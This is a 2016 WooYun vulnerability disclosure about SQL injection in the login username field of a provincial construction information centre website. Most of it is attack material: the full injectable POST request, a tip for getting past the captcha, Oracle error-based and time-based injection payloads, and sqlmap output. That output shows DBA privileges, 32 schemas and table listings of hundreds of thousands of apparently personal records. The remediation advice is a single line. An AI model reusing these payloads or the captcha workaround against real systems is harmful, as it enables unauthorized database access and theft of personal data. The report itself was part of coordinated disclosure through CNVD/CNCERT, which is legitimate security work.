当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0171019

漏洞标题:某省建设信息中心某站登录用户名处存在SQL注入(DBA权限/32个数据库/几十万敏感信息泄漏)

相关厂商:cncert国家互联网应急中心

漏洞作者: 路人甲

提交时间:2016-01-19 19:20

修复时间:2016-03-05 09:52

公开时间:2016-03-05 09:52

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-01-19: 细节已通知厂商并且等待厂商处理中
2016-01-22: 厂商已经确认,细节仅向厂商公开
2016-02-01: 细节向核心白帽子及相关领域专家公开
2016-02-11: 细节向普通白帽子公开
2016-02-21: 细节向实习白帽子公开
2016-03-05: 细节向公众公开

简要描述:

某站登录名处存在注入!~~~(你以为加了验证码就不能注入了么?)给首页不?好久没有上首页了!~~~

详细说明:

注入点:

http://**.**.**.**/app/Login/Login_Xzgl.aspx (POST)
__VIEWSTATE=/wEPDwUKMTI1MTk2NDQzM2RkZlN2pd5xKYBwXoQHpfu9mim3ff30ERX5BdlLHU955/0%3D&__VIEWS
TATEGENERATOR=36D4F313&__EVENTVALIDATION=/wEdAAUcqP6Xl8%2BgOST8pbNhPv7pdJrprxHot9VXnGSvdLvT
FB%2BrLgc2QhhilbcAxcI7CH6dtt%2BUwM3FI1M0Ks4N1wc
%2Bop4oRunf14dz2Zt2%2BQKDEFkPjtDkyZ3FioeQClwmwcgVRVn/f/tqSd2Adebsfwzj&txtYhm=admin&txtMm=1111
&passwordID=64021&btnLogin=


passwordID最好在注入测试前刷新一下页面,然后把页面上的验证码手动替换掉抓包到的数据里面的验证码,就可以注入了!
~~~

201.jpg


sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: txtYhm
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: __VIEWSTATE=/wEPDwUKMTI1MTk2NDQzM2RkZlN2pd5xKYBwXoQHpfu9mim3ff30ERX
5BdlLHU955/0=&__VIEWSTATEGENERATOR=36D4F313&__EVENTVALIDATION=/wEdAAUcqP6Xl8+gOS
T8pbNhPv7pdJrprxHot9VXnGSvdLvTFB+rLgc2QhhilbcAxcI7CH6dtt+UwM3FI1M0Ks4N1wc+op4oRu
nf14dz2Zt2+QKDEFkPjtDkyZ3FioeQClwmwcgVRVn/f/tqSd2Adebsfwzj&txtYhm=admin' AND 517
4=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(117)||CHR(101)
||CHR(113)||(SELECT (CASE WHEN (5174=5174) THEN 1 ELSE 0 END) FROM DUAL)||CHR(11
3)||CHR(101)||CHR(114)||CHR(114)||CHR(113)||CHR(62))) FROM DUAL) AND 'VTYN'='VTY
N&txtMm=1111&passwordID=64021&btnLogin=
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: __VIEWSTATE=/wEPDwUKMTI1MTk2NDQzM2RkZlN2pd5xKYBwXoQHpfu9mim3ff30ERX
5BdlLHU955/0=&__VIEWSTATEGENERATOR=36D4F313&__EVENTVALIDATION=/wEdAAUcqP6Xl8+gOS
T8pbNhPv7pdJrprxHot9VXnGSvdLvTFB+rLgc2QhhilbcAxcI7CH6dtt+UwM3FI1M0Ks4N1wc+op4oRu
nf14dz2Zt2+QKDEFkPjtDkyZ3FioeQClwmwcgVRVn/f/tqSd2Adebsfwzj&txtYhm=admin' AND 162
9=DBMS_PIPE.RECEIVE_MESSAGE(CHR(114)||CHR(76)||CHR(82)||CHR(76),5) AND 'aEhA'='a
EhA&txtMm=1111&passwordID=64021&btnLogin=
---
[23:03:34] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Oracle
[23:03:34] [INFO] fetching current user
[23:03:35] [INFO] retrieved: JZSCJGPT
current user:    'JZSCJGPT'
[23:03:35] [INFO] fetching current database
[23:03:35] [INFO] resumed: JZSCJGPT
[23:03:35] [WARNING] on Oracle you'll need to use schema names for enumeration a
s the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle):    'JZSCJGPT'
[23:03:35] [INFO] testing if current user is DBA
current user is DBA:    True
available databases [32]:
[*] CTXSYS
[*] DBSNMP
[*] DLQLXT
[*] EXFSYS
[*] FLOWS_030000
[*] FLOWS_FILES
[*] HBDYDB
[*] HBDYDB_BF
[*] HBDYDB_TEST
[*] HBSBDYKS
[*] HBSJSXXZXZHWHXT
[*] JGPTBZK
[*] JZSCJGPT
[*] JZSCJGPTNEW
[*] JZSCJGPTWF
[*] JZSCJGPTZJK
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SJBDB
[*] SMZ
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WK_TEST
[*] WKSYS
[*] WMSYS
[*] XDB
[*] ZLJD
Database: JZSCJGPT
+------------------------+---------+
| Table                  | Entries |
+------------------------+---------+
| RYJBXX                 | 408607  |
| RYZGXX                 | 388823  |
| SGTSCXX_SCR            | 196962  |
| SGTSCXX_KCSJDW         | 79553   |
| RYZCXX                 | 66610   |
| XMBMK                  | 45836   |
| SGTSCXX                | 37541   |
| RESULT_QYZZ            | 28709   |
| QYRYGXB                | 22123   |
| TBTENDERINFO           | 20162   |
| SGTSCXX_ZCRY           | 19455   |
| XMXX                   | 14228   |
| HZSQJLB                | 7698    |
| TBBUILDERLICENCEMANAGE | 7384    |
| ZTBRYB                 | 6815    |
| XMRYXX                 | 6756    |
| QYRYGXSHB              | 6079    |
| QYZCGL                 | 3256    |
| TBCONTRACTRECORDMANAGE | 3194    |
| QYSHB                  | 3094    |
| QYJBXX_RESULT          | 2666    |
| SYS_ZD                 | 1843    |
| SYS_YHGL               | 1669    |
| DIC_QYZZLB             | 1080    |
| SYS_JSFP               | 1018    |
| JGYSBAXX               | 986     |
| QYRYGXBBF              | 846     |
| SJSGQY                 | 800     |
| MBCS                   | 792     |
| SJXMCLQD               | 560     |
| XMBJSHYJ               | 522     |
| XMBJCL                 | 409     |
| SGTSCSHYJ              | 399     |
| QYJBXX_XXBG            | 339     |
| SJJLDW                 | 320     |
| QYXXBGSHB              | 223     |
| SJJSDW                 | 200     |
| RYCLXX                 | 186     |
| JSGCZLAQJDCL           | 179     |
| TPCORPBADDIC           | 175     |
| DXNDRYB                | 138     |
| ZTBSHB                 | 129     |
| SYS_YM                 | 100     |
| DXNDRYCLB              | 97      |
| SGXKDWGCB              | 91      |
| HTCLB                  | 79      |
| XMXX_MD5               | 77      |
| XMXX_MD5_CDC           | 77      |
| XMXX_TEST              | 77      |
| WSQYJECLB_ND           | 70      |
| QYJBXX_BACK            | 68      |
| TBPERSONBADDIC         | 67      |
| QYZZCLB                | 65      |
| SJXMDWQK               | 60      |
| WSJETBRY               | 56      |
| SYS_JS                 | 52      |
| ZTBCLB                 | 45      |
| HTSHB                  | 43      |
| QYZZCLB_XXBG           | 39      |
| DXNDSHB                | 37      |
| DZMB                   | 36      |
| CODEUPDATEJL           | 35      |
| DXNDCLB                | 35      |
| XMJLSCORESTAND         | 33      |
| WSJETBXM               | 31      |
| ZLAQJDSHYJ             | 30      |
| SGXKSHB                | 28      |
| QYZZCLB_BACK           | 22      |
| DXNDQYB                | 21      |
| DXNDXXB                | 21      |
| QYJEXXB                | 20      |
| SJXMJBQK               | 20      |
| SGXKCLB                | 19      |
| DXNDAJB                | 18      |
| SGTCLB                 | 18      |
| JSGCZLAQJD_NEW         | 14      |
| TBCORPGOODCREDITINFO   | 13      |
| DXNDJEJGB              | 9       |
| RYZGXXWS               | 9       |
| TPCORPBADDICSTANDARD   | 9       |
| WSGLJGLCB              | 9       |
| WSQYZZB                | 9       |
| QYSSCL                 | 7       |
| TBPROJECTFINISHMANAGE  | 7       |
| WSJETBDJ               | 6       |
| WSQYJESHB              | 6       |
| BA_ZBDL                | 5       |
| TBCORPBADCREDITINFO    | 5       |
| WSQYJESHB_ND           | 5       |
| TBPERSONBADDICSTANDARD | 4       |
| WSCZB                  | 4       |
| BA_RY                  | 3       |
| JGYSSHYJ               | 3       |
| CCTV                   | 2       |
| JGYSCLB                | 2       |
| QYSS                   | 2       |
| SGTSCJG                | 2       |
| BAI_TJ                 | 1       |
| DXNDXMB                | 1       |
| HTBAPDFCL              | 1       |
| JCDBCW                 | 1       |
| JCDBDW                 | 1       |
| JCDBFWB                | 1       |
| JCDBLWB                | 1       |
| JCDBRY                 | 1       |
| JCDBSCB                | 1       |
| NBCYRYJGZZE            | 1       |
| NBJZYQYCWZK            | 1       |
| NBJZYQYSCQK            | 1       |
| NBQYDZSWJYQK           | 1       |
| NBXXHQK                | 1       |
| ZHDBCWB                | 1       |
| ZHDBFWB                | 1       |
| ZHDBLWB                | 1       |
| ZHDBSCB                | 1       |
+------------------------+---------+
下面的是关于房价的?
Database: HBDYDB
+---------------+---------+
| Table         | Entries |
+---------------+---------+
| SP_FJ         | 215287  |
| SYSROLEUSER   | 59702   |
| SP_SXGXB      | 42454   |
| SP_JSGR       | 25724   |
| SP_SCYJB      | 24952   |
| SP_HZLZZ      | 22120   |
| LZSH_DJ       | 14805   |
| SBMXXB        | 13014   |
| GLYHZCB       | 12384   |
| SP_QYXX       | 12229   |
| SP_XCGLRY     | 11586   |
| SP_ZJYJRY     | 7463    |
| SP_HZSQB      | 7220    |
| QYZZ          | 5187    |
| SP_QYZZ       | 4903    |
| SP_ZCJZS      | 4529    |
| QYXXB         | 2953    |
| SYSSJZD       | 2936    |
| SP_JXSB       | 1936    |
| SP_SXZZ       | 1861    |
| JSFZRGCYJ     | 1766    |
| SP_QYFR       | 1545    |
| BA_JZC        | 1126    |
| SP_JSFZR      | 1099    |
| SP_QYJJ       | 983     |
| QYZZ_OLD      | 780     |
| SP_HZ         | 671     |
| SP_SXXX       | 629     |
| MBYSB         | 574     |
| BG_SPLC       | 474     |
| QYXXB_OLD     | 427     |
| BA_KC         | 367     |
| SP_GCYJ       | 308     |
| SP_BZCL       | 254     |
| SP_ZJSXGXB    | 213     |
| SYS_ROLE_MENU | 208     |
| BA_JC         | 202     |
| SP_GXB        | 151     |
| DIC_CAILIAO   | 142     |
| SP_ZZBM       | 126     |
| BG_XXBG       | 122     |
| BA_JZC_BACK   | 76      |
| BA_KC_BACK    | 74      |
| SYS_MENU      | 64      |
| DIC_TABLE     | 41      |
| ZJMBB         | 36      |
| SYSROLE       | 29      |
| BA_JC_BACK    | 26      |
| SP_SS         | 24      |
| SP_CLB        | 23      |
| SP_SXB        | 23      |
| BA_ZJ_BACK    | 18      |
| BA_ZJ         | 17      |
| DIC_SHIXIANG  | 13      |
| QYJBXX        | 2       |
+---------------+---------+


202.jpg


203.jpg


204.jpg


205.jpg


206.jpg


207.jpg


208.jpg


209.jpg


210.jpg


211.jpg


212.jpg


漏洞证明:

如上

修复方案:

过滤修复!~~~

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-01-22 10:19

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给湖北分中心,由其后续协调网站管理单位处置.

最新状态:

暂无